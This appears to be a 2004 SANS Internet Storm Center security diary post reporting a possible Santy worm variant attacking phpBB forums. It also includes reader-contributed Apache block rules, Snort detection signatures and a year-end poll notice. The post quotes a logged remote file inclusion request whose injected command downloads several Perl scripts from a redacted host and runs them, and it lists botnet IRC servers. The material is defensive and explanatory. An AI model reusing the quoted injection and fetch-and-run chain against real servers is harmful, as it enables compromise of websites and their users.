Threat Level: green Handler on Duty: Xavier Mertens

SANS ISC: InfoSec Handlers Diary Blog - Internet Storm Center Diary 2004-12-25 InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

Santy Variant?; Year End Poll

Published: 2004-12-25
Last Updated: 2004-12-26 02:11:18 UTC
by Koon Yaw Tan (Version: 1)
0 comment(s)
Santy Variant?

Merry Christmas! Unfortunately, the greetings from Marcus to all our readers has to keep short.

http://isc.sans.org/diary.php?date=2004-12-24

We are putting this up early because we have been receiving several reports on a possible Santy variant worm. It is however quite different from the original Santy worm.

It tries to pull several scripts from an affected forum (running phpBB). The forum could have been compromised and used as a base to attack others. Here is one of the submission we received. Others are quite similar.

"GET /modules.php?name=http://www.[XXX].net/spy.gif?&cmd=cd%20/tmp;

wget%20www.[XXX].net/spybot.txt;wget%20www.[XXX].net/worm1.txt;

wget%20www.[XXX].net/php.txt;wget%20www.[XXX].net/ownz.txt;

wget%20www.[XXX].net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;

perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 21626 "-" "LWP::Simple/5.803"

You can see that the files pull off include:

spy.gif (which contains a script)

spybot.txt

worm1.txt

php.txt

ownz.txt

zone.txt


worm1.txt is a perl script which attempts to search using Google/Yahoo for vulnerable system.

$site = "www.google.com";

$procura = "inurl:viewtopic.php?t=$numero";

spybot.txt is another perl script which attempts to set up an irc channel to irc.gigachat.net:6667.

From other piece of logs submitted, we have IRC server as:

ssh.gigachat.net

leaf-sunwave.animirc.net

eu.undernet.org

irc.efnet.net


Note that the above filenames changes depending on which hosts it is trying to wget. Other filenames include:

adfkgnnodfijg

bot

bot.txt

bot.txt.1

dry.scp

ssh.a

terrorbot.txt

terrorbot.txt.1

terrorworm.txt

terrorworm.txt.1

unbot.txt

unbot.txt.1

unbot.txt.2

unbot.txt.3

unworm.txt

unworm.txt.1

unworm.txt.2

unworm.txt.3

worm1.txt

worm.txt

worm.txt.1


One of our readers has blocked this attack with apache conf directives as such:

SetEnvIf User-Agent "LWP::" get_lost

SetEnvIf User-Agent "lwp-trivial" get_lost

<Directory /usr/local/apache/htdocs/your_phpdirectory>

Order Allow,Deny

Deny from env=get_lost

Allow from all

</Directory>


Another reader has created this apache rule:

<Directory /*>

RewriteEngine On

RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [OR]

RewriteCond %{QUERY_STRING} ^(.*)esystem(.*)

RewriteRule ^.*$ - [F]

</Directory>


K-Otik has published a copy that uses AOL/Yahoo search instead.

http://www.k-otik.com/exploits/20041225.SantyB.php

Let us know if you have seen the same thing.

Here are some Snort signatures written by Erik:

alert tcp $HOME_NET any -> any 80 (msg:"Santy.B worm variants
searching for targets"; content:"GET /search|3f|q=inurl|3a2a|
.php|3f2a|="; nocase; pcre:"/\d+&start=\d+/iR"; classtype:
trojan-activity; sid:900024; rev:1; )

alert tcp $HOME_NET any -> any 80 (msg:"Santy.B worm variants
searching for targets"; content:"GET /search|3f|"; nocase;
content: "q=inurl|3a|"; nocase; content:".php|3f|"; nocase;
within:10; pcre:"/&start=\d+/i"; classtype: trojan-activity;
sid:900024; rev:2; )

alert tcp $HOME_NET any -> any 80 (msg: Santy.B worm variants
serarching for targets (yahoo)"; content:"GET /search|3f|";
nocase; content: "p=inurl|3a|"; nocase; content:".php|3f2a|=";
nocase; within:10; pcre:"/\d+/iR"; content:"&ei=UTF-8&fl=0&all=
1&pstart=1&b="; nocase; pcre:"/\d+/iR"; flow:to_server,established;
classtype: trojan-activity; sid:900024; rev:3; )

alert tcp $HOME_NET any -> any 6667 (msg:"Suspected Botnet
Activity"; classtype: string-detect; sid:900025; rev:1;
tag:session,50,packets; content: "PRIVMSG"; nocase;
pcre:"/(cheguei gazelas|meh que tao|Status|Tempo|
Total pacotes|Total bytes|Média de envio|portas? aberta)/i"; )

alert tcp any any -> $HOME_NET $HTTP_PORTS (msg: "suspected
php injection attack"; content: "GET /"; nocase; content:
".php|3f|"; nocase; within: 64; pcre: "/(name=http|
cmd=.*(cd|perl|wget|id|uname|t?ftp))/i"; flow:to_server,
established; classtype: trojan-activity; sid:900026; rev:1; )

Bleedsnort has also created some Snort signatures to detect this:

http://www.bleedingsnort.com/

Use them as you deem fit.
Year End Poll

Earlier, we have asked you what is your favorites diary:

http://isc.sans.org/diary.php?date=2004-12-12

Have you send us your vote? If not, send us your choice now. We will close the poll on New Year eve and let you know the result soon after.

Keywords:
0 comment(s)
Diary Archives